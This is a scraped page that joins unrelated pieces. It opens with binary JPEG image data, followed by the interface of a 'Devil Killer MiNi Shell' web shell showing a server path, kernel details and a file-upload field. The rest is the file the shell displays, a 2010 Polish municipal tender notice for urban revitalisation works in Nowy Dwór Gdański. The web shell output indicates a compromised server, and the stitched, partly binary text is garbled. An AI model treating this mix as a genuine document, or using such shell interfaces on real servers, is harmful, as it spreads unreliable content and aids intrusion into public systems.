JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100218/33447-N-2010.html

<p class="kh_header"><b>Nowy Dwór Gdański: Rewitalizacja przestrzeni miejskiej w Nowym Dworze Gdańskim</b><br>
<b>Numer ogłoszenia: 33447 - 2010; data zamieszczenia: 18.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gminy Nowy Dwór Gdański , ul. Wejhera 3, 82-100 Nowy Dwór Gdański, woj. pomorskie, tel. 055 2472401, faks 055 2472405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastonowydwor.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja przestrzeni miejskiej w Nowym Dworze Gdańskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie kompleksowej rewitalizacji przestrzeni miejskiej w Nowym Dworze Gdańskim:
1) Zagospodarowanie terenów zielonych przy Żuławskim Ośrodku Kultury i Żuławskim Parku Historycznym;
2) Zagospodarowanie przestrzeni publicznej przy ul. Wejhera i Sikorskiego;
3) Zagospodarowanie przestrzeni publicznej w rejonie ulicy Warszawskiej;
4) Odnowa parku przy ulicy Drzymały;
5) Utworzenie strefy bezpieczeństwa w rejonie ulic Kopernika i Wejhera poprzez przebudowę tych ulic.

Ad 1) Zagospodarowanie terenów zielonych przy Żuławskim Ośrodku Kultury i Żuławskim Parku Historycznym w Nowym Dworze Gdańskim, w tym: scena letnia, oświetlenie terenu oraz roboty budowlane na obiektach wpisanych do rejestru zabytków, obejmuje:
a) roboty rozbiórkowe i przygotowanie terenu:
- demontaż lamp parkowych oraz istniejącej sieci energetycznej;
- rozbiórka nawierzchni z płytek chodnikowych na istniejących ciągach pieszych;
- rozbiórka nawierzchni parkingu i terenów utwardzonych wokół budynku ŻOK;
- pozostałe roboty towarzyszące;
b) prace branży ogólnobudowlanej wraz z projektowaniem (Uwaga! Zakłada sie opracowanie projektu wykonawczego przez dostawce fontanny - w projekcie zamieszczono rozwiązania ogólne.):
- wykonanie żelbetowej misy i płyty dennej fontanny;
- wykonanie kładek w misie fontanny;
- wykonanie komory technologicznej;
- budowa instalacji zasilającej, automatyki i oświetlenia podwodnego fontanny;
- budowa instalacji technologicznych fontanny;
c) prace montażowe i ogólnobudowlane:
- montaż urządzeń rekreacyjnych na placu zabaw oraz innych elementów małej architektury;
- budowa sceny letniej;
- budowa oraz wykonanie oznakowania poziomego i pionowego miasteczka ruchu drogowego (wg projektu wykonawczego);
- wykonanie ogrodzenia okalającego projektowany obszar od strony rzeki Tugi;
- wykonanie prac remontowych dla wszystkich schodów zewnętrznych, murków oporowych oraz świetlików okiennych z wyjątkiem wejść głównych do budynku Starostwa i ŻOK;
- wykonanie zagospodarowania terenów zielonych (wg projektu, wykonawczego) wraz z obsianiem 
i pierwszym koszeniem trawników;
- pozostałe roboty towarzyszące;
d) prace branży drogowej:
- wykonanie nowych ciągów pieszych i utwardzeń terenu wraz z oraz nawierzchni parkingiem przed budynkiem Starostwa wraz z regulacją i ewentualną naprawą wszelkich istniejących i nowo wykonanych studzienek sieciowych;
e) prace branży elektroenergetycznej:
- budowa przyłącza i linii kablowej oraz oświetlenia terenów zielonych / ciągów pieszych;
- budowa przyłącza energetycznego fontanny;
- budowa przyłącza, linii kablowej i montaż oświetlenia, pełniących funkcję iluminacji budynków starostwa oraz budynku ŻOK;
- budowa przyłącza i instalacji zasilających i oświetleniowych Sceny Letniej;
f) prace branży sanitarnej:
- budowa nowego przyłącza wody do fontanny;
- budowa przyłącza kanalizacji deszczowej do fontanny.

Zamawiający informuje, ze posiada aktualne pozwolenie na budowę nr 2-80/09, wydane przez Starostwo Powiatowe w Nowym Dworze Gdańskim na w/w inwestycję z dnia 15.07.2009r.

Ad 2) Zagospodarowanie przestrzeni publicznej przy ul. Wejhera i Sikorskiego (skwer w rejonie ulic Sikorskiego i Wejhera) obejmuje:
a) roboty rozbiórkowe i przygotowawcze;
b) prace montażowe i ogólnobudowlane:
- wykonanie budynku Informacji Turystycznej w konstrukcji aluminiowej;
- wykonanie pergoli w konstrukcji drewnianej;
- montaż elementów małej architektury;
- wykonanie szczelnego, żelbetowego zbiornika buforowego dla fontanny wraz z zabezpieczeniem wykopów 
i obniżeniem zwierciadła wody gruntowej na czas realizacji prac;
- wykonanie zagospodarowania terenów zielonych wraz z obsianiem i pierwszym koszeniem trawników;
- pozostałe roboty towarzyszące;
c) prace branży drogowej:
- wykonanie nowych ciągów pieszych i utwardzeń terenu wraz z regulacją wszelkich istniejących i nowo wykonanych studzienek sieciowych;
- pozostałe roboty towarzyszące;
d) prace branży elektroenergetycznej:
- budowa przyłącza, instalacji zasilającej, automatyki i oświetlenia podwodnego fontanny;
- budowa przyłącza, linii kablowej oraz oświetlenia skweru;
- budowa przyłącza i instalacji wewnętrznej budynku PIT;
- pozostałe roboty towarzyszące;
e) prace branży sanitarnej:
- wykonanie przyłącza wody do fontanny i budynku PIT;
- budowa instalacji technologicznej fontanny;
- budowa przyłączy, sieci kanalizacji deszczowej i sanitarnej dla skweru / fontanny i budynku PIT;
- budowa wewnętrznych instalacji sanitarnych dla budynku PIT;
- pozostałe roboty towarzyszące;
f) pozostałe roboty niewymienione powyżej, wynikające z dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych.

Uwaga! Na budowę budynku Punktu Informacji Turystycznej należy prowadzić osobny Dziennik Budowy 
i odrębnie ją fakturować. Budowa Punktu Informacji Turystycznej stanowi element innego projektu, dofinansowanego w ramach tego samego programu i funduszu co Rewitalizacja przestrzeni miejskiej 
w Nowym Dworze Gdańskim; projekt ten nosi nazwę: Kampania Promocyjna Żuław.

Zamawiający informuje, że posiada aktualne pozwolenie na budowę nr 2-42/09, wydane przez Starostwo Powiatowe w Nowym Dworze Gdańskim na w/w inwestycję z dnia 06.05.2009 r.

Ad 3) Zagospodarowanie przestrzeni publicznej w rejonie ulicy Warszawskiej (utworzenie 1 parku) obejmuje:
a) roboty rozbiórkowe i przygotowawcze;
b) prace montażowe i ogólnobudowlane:
- montaż urządzeń rekreacyjnych na placu zabaw oraz innych elementów małej architektury;
- wykonanie murków zewnętrznych;
- wykonanie zagospodarowania terenów zielonych wraz z obsianiem i pierwszym koszeniem trawników;
- pozostałe roboty towarzyszące;
c) prace branży drogowej:
- wykonanie ciągów pieszych / ścieżek rowerowych i utwardzeń terenu i zjazdów z dróg publicznych;
- pozostałe roboty towarzyszące;
d) prace branży elektroenergetycznej:
- budowa przyłącza, linii kablowej oraz oświetlenia terenów zielonych;
- budowa przyłącza, linii kablowej, oświetlenia ciągów pieszych / ścieżek rowerowych oraz murków;
- pozostałe roboty towarzyszące;
e) pozostałe roboty niewymienione powyżej, wynikające z dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych.

Zamawiający informuje, że posiada aktualne pozwolenie na budowę nr 2-41/09, wydane przez Starostwo Powiatowe w Nowym Dworze Gdańskim na w/w inwestycję z dnia 06.05.2009r.

Ad 4) Odnowa parku przy ulicy Drzymały w Nowym Dworze Gdańskim, w tym: budowa pomostu spacerowego, linii kablowej oświetlenia terenu, trzech pergoli - altan, na terenie działek nr 500/2, 389, 502 
w Nowym Dworze Gdańskim, obejmuje:
a) roboty rozbiórkowe i przygotowawcze:
- demontaż lamp parkowych oraz istniejącej sieci energetycznej;
- rozbiórka nawierzchni z kostki betonowej na istniejących ciągach pieszych (kostka do ponownego wbudowania);
- pozostałe roboty towarzyszące;
b) prace montażowe i ogólnobudowlane:
- wykonanie podbudowy z kruszywa łamanego oraz trapu bulwarowego wzdłuż nabrzeża;
- wykonanie pergoli w konstrukcji drewnianej;
- montaż elementów małej architektury;
- wykonanie zagospodarowania terenów zielonych wraz z obsianiem i pierwszym koszeniem trawników;
- pozostałe roboty towarzyszące;
c) prace branży hydrotechnicznej:
- nadbudowa istniejącego oczepu wieńczącego żelbetowe umocnienie nabrzeża rzeki Tugi;
- montaż elementów wyposażenia nabrzeża do cumowania niewielkich jednostek pływających;
- pozostałe roboty towarzyszące;
d) prace branży drogowej:
- wykonanie nowych ciągów pieszych i utwardzeń terenu z wykorzystaniem kostki rozbiórkowej;
- pozostałe roboty towarzyszące;
e) prace branży elektroenergetycznej:
- budowa przyłącza i linii kablowej oraz oświetlenia terenów zielonych / ciągów pieszych;
- pozostałe roboty towarzyszące;
f) pozostałe roboty niewymienione powyżej, wynikające z dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych.

Zamawiający informuje, że posiada aktualne pozwolenie na budowę nr 2-132/09, wydane przez Starostwo Powiatowe w Nowym Dworze Gdańskim na w/w inwestycję z dnia 26.10.2009r.

Ad 5) Utworzenie strefy bezpieczeństwa w rejonie ulic Kopernika i Wejhera poprzez przebudowę tych ulic obejmuje:
a) ul. Kopernika:
- przebudowę 204 mb istniejącej nawierzchni ulicznej na powierzchni 938,93 m2;
- przebudowę chodników 904,60 m2;
- przebudowę istniejącego wodociągu na długości 207 mb;
- budowę kablowej linii oświetlenia ulicznego NN 0,4 kv;
b) ul. Wejhera:
- przebudowę 171 mb istniejącej nawierzchni ulicy na powierzchni 1167,70 m2;
- przebudowę chodników 850 m2;
- przebudowę istniejącego wodociągu na długości 193,50 mb;
- budowę kablowej linii oświetlenia ulicznego NN 0,4 kv.

2. Szczegółowy opis przedmiotu zamówienia stanowią: dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych, będące załącznikami do niniejszej Specyfikacji istotnych warunków zamówienia (SIWZ).

3. Zamówienie powinno być wykonane zgodnie ze SIWZ wraz z załączonymi dokumentami.

4. W zakres zamówienia wchodzą wszystkie prace, materiały, urządzenia i usługi niezbędne 
do jego kompleksowego wykonania zamówienia i przekazania obiektu do użytkowania - zarówno wynikające wprost z dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych, 
jak również w nich nieujęte, tj. np.: obsługa i inwentaryzacja geodezyjna wykonywanych robót, roboty przygotowawcze i porządkowe, zagospodarowanie terenu budowy, w tym: zaplecze budowy, ogrodzenie, drogi dojazdowe i montażowe oraz zasilanie w wodę i energię elektryczną, dozorowanie, telefon oraz zajęcie pasa drogowego.

5. Zamawiający zaleca, aby Wykonawca przeprowadził wizję w terenie w celu ustalenia pełnego zakresu prac związanych z realizacją zamówienia.

6. Wskazanie w opisie przedmiotu zamówienia: znaków towarowych, patentów lub pochodzenia, nie ma 
na celu naruszenia art. 29 i 7 ustawy Pzp, a służy jedynie jak najdokładniejszemu przedstawieniu oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne 
pod warunkiem zachowania co najmniej tego samego poziomu technologicznego i wydajnościowego.

7. Zamawiający dopuszcza rozwiązania równoważne opisanym za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy Pzp. Wykonawca, 
który powołuje się na rozwiązania równoważne tak opisanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Pzp).

8. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1, 37.53.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 200 000,00 zł
(słownie: dwieście tysięcy 00/100 zł).

2. Wadium wnosi się przed upływem terminu składania ofert.
	W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się moment uznania rachunku bankowego Zamawiającego.

3. Wadium może być wnoszone w jednej lub kilku następujących formach:
	a) pieniądzu;
	b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
	    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	c) gwarancjach bankowych;
	d) gwarancjach ubezpieczeniowych;
	e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
	    z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
	    (t.j. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).

4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Żuławski Bank Spółdzielczy Nowy Dwór Gdański Nr 89 8306 0003 0000 8006 2000 0040
w tytule: Wadium - Rewitalizacja przestrzeni miejskiej ZP.RC/341-2/10.

5. Gwarancje i poręczenia złożone jako wadium muszą posiadać okres ważności nie krótszy niż termin związania ofertą, pod rygorem wykluczenia Wykonawcy z postępowania.

6. Oryginały dokumentów potwierdzających wniesienie wadium w formie innej niż w pieniądzu należy dołączyć do oferty lub złożyć w Referacie Budżetowo - Księgowym Urzędu Miejskiego w Nowym Dworze Gdańskim (pokój nr 16).

7. Warunki zwrotu, zatrzymania oraz żądania ponownego wniesienia wadium określa art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zapewnią realizację zamówienia w oparciu 
o wiedzę i doświadczenie wynikające z wykonania - zgodnie z zasadami sztuki budowlanej i z prawidłowym ukończeniem - w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
1) jednej roboty budowlanej o wartości co najmniej 4 500 000 zł, obejmującej: roboty drogowe, roboty ziemne, roboty ogólnobudowlane, w tym konstrukcyjne żelbetowe;
2) jednej roboty budowlanej o wartości co najmniej 300 000 zł, polegającej na wykonaniu robót hydrotechnicznych w nurcie rzeki i/lub kanału;
3) jednej roboty budowlanej o wartości co najmniej 300 000 zł, na obiekcie wpisanym do rejestru zabytków i/lub znajdującym się w ewidencji zabytków;
4) jednej roboty budowlanej o wartości co najmniej 200 000 zł, polegającej na budowie i/lub przebudowie sieci energetycznych;
5) jednej roboty budowlanej o wartości co najmniej 200 000 zł, obejmującej zagospodarowanie terenów zielonych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w wykonywaniu zamówienia zapewnią uczestnictwo:
1) co najmniej jednej osoby - przewidzianej do pełnienia funkcji kierownika budowy - posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej 
bez ograniczeń, posiadającej przynajmniej 3 lata doświadczenia jako kierownik budowy;
2) co najmniej jednej osoby - przewidzianej do pełnienia funkcji kierownika robót drogowych - posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, posiadającej przynajmniej 2 lata doświadczenia jako kierownik robót;
3) co najmniej jednej osoby - przewidzianej do pełnienia funkcji kierownika robót sanitarnych w specjalności sieci wodno-kanalizacyjnych - posiadającej uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności sieci wodno-kanalizacyjnych, posiadającej przynajmniej 2 lata doświadczenia jako kierownik robót;
4) co najmniej jednej osoby - przewidzianej do pełnienia funkcji kierownika robót elektrycznych 
- posiadającej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej, posiadającej przynajmniej 2 lata doświadczenia jako kierownik robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Sytuacja ekonomiczna i finansowa
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) posiadają lub będą posiadali środki finansowe i/lub zdolność kredytową w wysokości co najmniej 
1 500 000 zł ;
2) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na kwotę co najmniej 5 000 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">oświadczenie potwierdzające spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo w oryginale lub poświadczone notarialnie, określające jego zakres i upoważnienie do zaciągania zobowiązań w imieniu Wykonawcy oraz informację, że jest ono obowiązujące dla danego postępowania, podpisane przez osobę(-y) uprawnione 
do reprezentacji Wykonawcy;
2. w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo 
